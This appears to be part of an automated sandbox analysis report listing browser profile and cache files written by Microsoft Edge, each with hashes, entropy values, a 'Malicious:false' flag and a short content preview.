                                                                                                                                                                                                                                                                                                Preview:MANIFEST-000001.

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\LOG

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):281
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.232944828002551
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:6:iOvqUOhq1wkn23oH+Tcwtfrl2KLlNkxAq2Pwkn23oH+TcwtfrK+IFUv:7M1fYeb1LMAvYfYeb23FUv
                                                                                                                                                                                                                                                                                                MD5:E6A43DA0D4B8E1E8A64CE23CDCAD6D2A
                                                                                                                                                                                                                                                                                                SHA1:543F9D6E1689FC86E39F78F7A0B2D88DEBC827AD
                                                                                                                                                                                                                                                                                                SHA-256:AA81C359C47C85E8328B056E1BBC4B3888CBAA7D49575864A58525C1F3CA571E
                                                                                                                                                                                                                                                                                                SHA-512:5D56CECF8BDE36FA3BA96A01A002244FADA2D1E1084590168A9773E26EE8AA0FBE8CEFCCC7611C00CEDB8A78025A2ADFE94F72899E97600A60C8D10FF8EC7284
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:2025/03/08-18:43:30.481 1df0 Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db since it was missing..2025/03/08-18:43:30.497 1df0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/MANIFEST-000001.

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\MANIFEST-000001

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:OpenPGP Secret Key
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):41
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.704993772857998
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                                                                                                                                                MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                                                                                                                                                SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                                                                                                                                                SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                                                                                                                                                SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:.|.."....leveldb.BytewiseComparator......

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\000001.dbtmp

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):16
                                                                                                                                                                                                                                                                                                Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                                MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                                SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                                SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                                SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:MANIFEST-000001.

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\000003.log

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):617
                                                                                                                                                                                                                                                                                                Entropy (8bit):3.9325179151892424
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:12:G0nYUteza//z3p/Uz0RuWlJhC+lvBavRtin01zv0:G0nYUtezaD3RUovhC+lvBOL0
                                                                                                                                                                                                                                                                                                MD5:AD15D72AA4792C14DDD002CED70E8245
                                                                                                                                                                                                                                                                                                SHA1:30D0E75166FDA7126A73480EE3222C193231B579
                                                                                                                                                                                                                                                                                                SHA-256:17A781FB31D3176491D9B277ADEEE5521972C68956A2271637BBCBFEB27D6A7D
                                                                                                                                                                                                                                                                                                SHA-512:20B8D19B529A392FE0CBB44844926210D98C477498377B8370AA3A3A763C047EF96BE341686406522868EF848C83EF5EF4792B17CDD0462D4680EDA542C8A54F
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:.h.6.................__global... .t...................__global... .9..b.................33_..........................21_.....n[.=.................33_.....vuNX.................21_.....<...................20_.....,.1..................19_.....QL.s.................18_.....<.J|.................37_...... .A.................38_..........................39_........].................20_.....Owa..................20_.....`..N.................19_.....D8.X.................18_......`...................37_..........................38_......\e..................39_.....dz.|.................9_.....'\c..................9_.....

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\CURRENT (copy)

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):16
                                                                                                                                                                                                                                                                                                Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                                MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                                SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                                SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                                SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:MANIFEST-000001.

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\LOG

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):299
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.191754735720912
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:6:iOvkhq1wkn23oH+Tcwtfrzs52KLlNqOAq2Pwkn23oH+TcwtfrzAdIFUv:7C1fYebs9LenvYfYeb9FUv
                                                                                                                                                                                                                                                                                                MD5:A02AF0CA33D2D059DCF1B1BB2BC729FD
                                                                                                                                                                                                                                                                                                SHA1:9A46DA22E412198AA5E78298354197F57615D330
                                                                                                                                                                                                                                                                                                SHA-256:3B9930B30A3517C943D2B29B1E7E4132C8A7EFBB2A08315029EFDE22D2AB4F83
                                                                                                                                                                                                                                                                                                SHA-512:2DBCFFA9285200B0A9BD92DA516FE77326DF0FB8E9B84ED9572DA7E29051D8FDD178CF71CEE2A3900B3F15A215F0278C4C7D8DA399A63B14BA4738F5D16D66FF
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:2025/03/08-18:43:30.461 1df0 Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata since it was missing..2025/03/08-18:43:30.478 1df0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/MANIFEST-000001.

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\MANIFEST-000001

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:OpenPGP Secret Key
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):41
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.704993772857998
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                                                                                                                                                MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                                                                                                                                                SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                                                                                                                                                SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                                                                                                                                                SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:.|.."....leveldb.BytewiseComparator......

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\data_0

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:FoxPro FPT, blocks size 512, next free block index 3284796609, field type 0
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):8192
                                                                                                                                                                                                                                                                                                Entropy (8bit):0.01057775872642915
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:MsFl:/F
                                                                                                                                                                                                                                                                                                MD5:CF89D16BB9107C631DAABF0C0EE58EFB
                                                                                                                                                                                                                                                                                                SHA1:3AE5D3A7CF1F94A56E42F9A58D90A0B9616AE74B
                                                                                                                                                                                                                                                                                                SHA-256:D6A5FE39CD672781B256E0E3102F7022635F1D4BB7CFCC90A80FFFE4D0F3877E
                                                                                                                                                                                                                                                                                                SHA-512:8CB5B059C8105EB91E74A7D5952437AAA1ADA89763C5843E7B0F1B93D9EBE15ED40F287C652229291FAC02D712CF7FF5ECECEF276BA0D7DDC35558A3EC3F77B0
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:............$...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\data_1

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):270336
                                                                                                                                                                                                                                                                                                Entropy (8bit):8.280239615765425E-4
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:MsEllllkEthXllkl2:/M/xT02
                                                                                                                                                                                                                                                                                                MD5:D0D388F3865D0523E451D6BA0BE34CC4
                                                                                                                                                                                                                                                                                                SHA1:8571C6A52AACC2747C048E3419E5657B74612995
                                                                                                                                                                                                                                                                                                SHA-256:902F30C1FB0597D0734BC34B979EC5D131F8F39A4B71B338083821216EC8D61B
                                                                                                                                                                                                                                                                                                SHA-512:376011D00DE659EB6082A74E862CFAC97A9BB508E0B740761505142E2D24EC1C30AA61EFBC1C0DD08FF0F34734444DE7F77DD90A6CA42B48A4C7FAD5F0BDDD17
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\data_2

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):8192
                                                                                                                                                                                                                                                                                                Entropy (8bit):0.011852361981932763
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:MsHlDll:/H
                                                                                                                                                                                                                                                                                                MD5:0962291D6D367570BEE5454721C17E11
                                                                                                                                                                                                                                                                                                SHA1:59D10A893EF321A706A9255176761366115BEDCB
                                                                                                                                                                                                                                                                                                SHA-256:EC1702806F4CC7C42A82FC2B38E89835FDE7C64BB32060E0823C9077CA92EFB7
                                                                                                                                                                                                                                                                                                SHA-512:F555E961B69E09628EAF9C61F465871E6984CD4D31014F954BB747351DAD9CEA6D17C1DB4BCA2C1EB7F187CB5F3C0518748C339C8B43BBD1DBD94AEAA16F58ED
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\data_3

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):8192
                                                                                                                                                                                                                                                                                                Entropy (8bit):0.012340643231932763
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:MsGl3ll:/y
                                                                                                                                                                                                                                                                                                MD5:41876349CB12D6DB992F1309F22DF3F0
                                                                                                                                                                                                                                                                                                SHA1:5CF26B3420FC0302CD0A71E8D029739B8765BE27
                                                                                                                                                                                                                                                                                                SHA-256:E09F42C398D688DCE168570291F1F92D079987DEDA3099A34ADB9E8C0522B30C
                                                                                                                                                                                                                                                                                                SHA-512:E9A4FC1F7CB6AE2901F8E02354A92C4AAA7A53C640DCF692DB42A27A5ACC2A3BFB25A0DE0EB08AB53983132016E7D43132EA4292E439BB636AAFD53FB6EF907E
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\index

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:FoxPro FPT, blocks size 768, next free block index 3284796353, field type 0
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):262512
                                                                                                                                                                                                                                                                                                Entropy (8bit):9.553120663130604E-4
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:LsNlu0e:Ls3u0e
                                                                                                                                                                                                                                                                                                MD5:8EE936B5FC2701428749DB660896959C
                                                                                                                                                                                                                                                                                                SHA1:2C5314903D0A9C8BCD792958CDBA567ACDC76526
                                                                                                                                                                                                                                                                                                SHA-256:C04AB31DB2486B87B865DA78BAF52622618F535FAB0D4C821F7873A1A582B15D
                                                                                                                                                                                                                                                                                                SHA-512:2EAB9BB5E37951D5872680048DFDDF27D041989810B3EB20621F0DFF31BB320FEB4BF2B4ECBED807AE43FB8767454017763DDB0783EEAAD655ECE4D568419802
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:........................................~...s./.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\GraphiteDawnCache\data_0

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:FoxPro FPT, blocks size 512, next free block index 3284796609, field type 0
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):8192
                                                                                                                                                                                                                                                                                                Entropy (8bit):0.01057775872642915
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:MsFl:/F
                                                                                                                                                                                                                                                                                                MD5:CF89D16BB9107C631DAABF0C0EE58EFB
                                                                                                                                                                                                                                                                                                SHA1:3AE5D3A7CF1F94A56E42F9A58D90A0B9616AE74B
                                                                                                                                                                                                                                                                                                SHA-256:D6A5FE39CD672781B256E0E3102F7022635F1D4BB7CFCC90A80FFFE4D0F3877E
                                                                                                                                                                                                                                                                                                SHA-512:8CB5B059C8105EB91E74A7D5952437AAA1ADA89763C5843E7B0F1B93D9EBE15ED40F287C652229291FAC02D712CF7FF5ECECEF276BA0D7DDC35558A3EC3F77B0
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:............$...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\GraphiteDawnCache\data_1

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):270336
                                                                                                                                                                                                                                                                                                Entropy (8bit):8.280239615765425E-4
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:MsEllllkEthXllkl2:/M/xT02
                                                                                                                                                                                                                                                                                                MD5:D0D388F3865D0523E451D6BA0BE34CC4
                                                                                                                                                                                                                                                                                                SHA1:8571C6A52AACC2747C048E3419E5657B74612995
                                                                                                                                                                                                                                                                                                SHA-256:902F30C1FB0597D0734BC34B979EC5D131F8F39A4B71B338083821216EC8D61B
                                                                                                                                                                                                                                                                                                SHA-512:376011D00DE659EB6082A74E862CFAC97A9BB508E0B740761505142E2D24EC1C30AA61EFBC1C0DD08FF0F34734444DE7F77DD90A6CA42B48A4C7FAD5F0BDDD17
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\GraphiteDawnCache\data_2

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):8192
                                                                                                                                                                                                                                                                                                Entropy (8bit):0.011852361981932763
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:MsHlDll:/H
                                                                                                                                                                                                                                                                                                MD5:0962291D6D367570BEE5454721C17E11
                                                                                                                                                                                                                                                                                                SHA1:59D10A893EF321A706A9255176761366115BEDCB
                                                                                                                                                                                                                                                                                                SHA-256:EC1702806F4CC7C42A82FC2B38E89835FDE7C64BB32060E0823C9077CA92EFB7
                                                                                                                                                                                                                                                                                                SHA-512:F555E961B69E09628EAF9C61F465871E6984CD4D31014F954BB747351DAD9CEA6D17C1DB4BCA2C1EB7F187CB5F3C0518748C339C8B43BBD1DBD94AEAA16F58ED
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\GraphiteDawnCache\data_3

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):8192
                                                                                                                                                                                                                                                                                                Entropy (8bit):0.012340643231932763
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:MsGl3ll:/y
                                                                                                                                                                                                                                                                                                MD5:41876349CB12D6DB992F1309F22DF3F0
                                                                                                                                                                                                                                                                                                SHA1:5CF26B3420FC0302CD0A71E8D029739B8765BE27
                                                                                                                                                                                                                                                                                                SHA-256:E09F42C398D688DCE168570291F1F92D079987DEDA3099A34ADB9E8C0522B30C
                                                                                                                                                                                                                                                                                                SHA-512:E9A4FC1F7CB6AE2901F8E02354A92C4AAA7A53C640DCF692DB42A27A5ACC2A3BFB25A0DE0EB08AB53983132016E7D43132EA4292E439BB636AAFD53FB6EF907E
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\GraphiteDawnCache\index

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:FoxPro FPT, blocks size 768, next free block index 3284796353, field type 0
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):262512
                                                                                                                                                                                                                                                                                                Entropy (8bit):9.553120663130604E-4
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:LsNlire:Ls3l
                                                                                                                                                                                                                                                                                                MD5:0B9D1C32832EC58E20E392611DF47BCB
                                                                                                                                                                                                                                                                                                SHA1:394671A3DC518DF099D21EA7BC8362E104696299
                                                                                                                                                                                                                                                                                                SHA-256:94C79CFD4373ABEE0623E4BFFE1824FC7D8EBD58FFB0CC74BF73B09EE83FC128
                                                                                                                                                                                                                                                                                                SHA-512:E9A65C30C896D728308537028554BAC5CCF47CAAF77251507D9B249774D034624831817F188D5630D80B9495324308C44E0F03641E585537865BA6495635A4C9
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:........................................n...s./.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Last Browser

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):120
                                                                                                                                                                                                                                                                                                Entropy (8bit):3.32524464792714
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:tbloIlrJFlXnpQoWcNylRjlgbYnPdJiG6R7lZAUAl:tbdlrYoWcV0n1IGi7kBl
                                                                                                                                                                                                                                                                                                MD5:A397E5983D4A1619E36143B4D804B870
                                                                                                                                                                                                                                                                                                SHA1:AA135A8CC2469CFD1EF2D7955F027D95BE5DFBD4
                                                                                                                                                                                                                                                                                                SHA-256:9C70F766D3B84FC2BB298EFA37CC9191F28BEC336329CC11468CFADBC3B137F4
                                                                                                                                                                                                                                                                                                SHA-512:4159EA654152D2810C95648694DD71957C84EA825FCCA87B36F7E3282A72B30EF741805C610C5FA847CA186E34BDE9C289AAA7B6931C5B257F1D11255CD2A816
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.M.i.c.r.o.s.o.f.t.\.E.d.g.e.\.A.p.p.l.i.c.a.t.i.o.n.\.m.s.e.d.g.e...e.x.e.

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Last Version

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):13
                                                                                                                                                                                                                                                                                                Entropy (8bit):2.7192945256669794
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:NYLFRQI:ap2I
                                                                                                                                                                                                                                                                                                MD5:BF16C04B916ACE92DB941EBB1AF3CB18
                                                                                                                                                                                                                                                                                                SHA1:FA8DAEAE881F91F61EE0EE21BE5156255429AA8A
                                                                                                                                                                                                                                                                                                SHA-256:7FC23C9028A316EC0AC25B09B5B0D61A1D21E58DFCF84C2A5F5B529129729098
                                                                                                                                                                                                                                                                                                SHA-512:F0B7DF5517596B38D57C57B5777E008D6229AB5B1841BBE74602C77EEA2252BF644B8650C7642BD466213F62E15CC7AB5A95B28E26D3907260ED1B96A74B65FB
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:117.0.2045.47

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State (copy)

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):6820
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.794169434176394
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:96:iaqkHfx/T0j85ih/cI9URLl8RotoDMFVvlwhee4IbONIeTC6XQS0qGqk+Z4uj+rE:akJ/YeiRUwhe6qRAq1k8SPxVLZ7VTi3
                                                                                                                                                                                                                                                                                                MD5:48F6EF5330D255411DDEEFDD943F4CE3
                                                                                                                                                                                                                                                                                                SHA1:2652A28B2AA93BD45EDCCE7A90157BA8CB72BBBD
                                                                                                                                                                                                                                                                                                SHA-256:9B342D917BE8FC1AA2A9137599F1E73896319F57DE1E960E0794D643F39A0DB6
                                                                                                                                                                                                                                                                                                SHA-512:8973E0FEFFE6381B7CC4B7C946C71F853D2DBD2EA5AC1DEA469D0EFAEDF651AF80E69BBD48BA35D2E7709474807733695E8E52BFA784F50239A7C6F2607FF72D
                                                                                                                                                                                                                                                                                                Malicious:false
